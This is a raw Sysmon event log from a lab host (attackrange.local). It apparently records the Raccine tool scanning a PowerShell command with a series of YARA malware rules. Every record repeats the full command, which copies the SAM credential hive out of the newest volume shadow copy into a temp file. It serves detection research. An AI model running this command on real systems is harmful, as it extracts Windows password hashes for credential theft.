ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165523Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.503{9DBE88B5-3BBF-61B2-9805-010000000E02}31526444C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-9705-010000000E02}7480C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165517Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.491{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-9705-010000000E02}7480C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165516Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.491{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-9705-010000000E02}7480C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165515Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.491{9DBE88B5-3BBF-61B2-9705-010000000E02}7480C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165512Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.475{9DBE88B5-3BBF-61B2-9605-010000000E02}53645024C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-9505-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165506Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.463{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-9505-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165505Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.461{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-9505-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165504Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.462{9DBE88B5-3BBF-61B2-9505-010000000E02}5756C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165501Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.445{9DBE88B5-3BBF-61B2-9405-010000000E02}53965380C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-9305-010000000E02}5464C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165494Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.431{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-9305-010000000E02}5464C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165493Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.431{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-9305-010000000E02}5464C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165492Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.431{9DBE88B5-3BBF-61B2-9305-010000000E02}5464C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165489Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.415{9DBE88B5-3BBF-61B2-9205-010000000E02}20607492C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-9105-010000000E02}2712C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165483Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.403{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-9105-010000000E02}2712C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165482Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.403{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-9105-010000000E02}2712C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165481Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.403{9DBE88B5-3BBF-61B2-9105-010000000E02}2712C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165478Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.386{9DBE88B5-3BBF-61B2-9005-010000000E02}81886320C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8F05-010000000E02}6768C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165472Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.372{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8F05-010000000E02}6768C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165471Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.371{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8F05-010000000E02}6768C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165470Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.372{9DBE88B5-3BBF-61B2-8F05-010000000E02}6768C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165467Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.355{9DBE88B5-3BBF-61B2-8E05-010000000E02}17885704C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8D05-010000000E02}1544C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165461Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.342{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8D05-010000000E02}1544C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165460Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.342{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8D05-010000000E02}1544C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165459Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.342{9DBE88B5-3BBF-61B2-8D05-010000000E02}1544C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165456Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.324{9DBE88B5-3BBF-61B2-8C05-010000000E02}44881372C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8B05-010000000E02}4888C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165450Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.311{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8B05-010000000E02}4888C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165449Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.311{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program 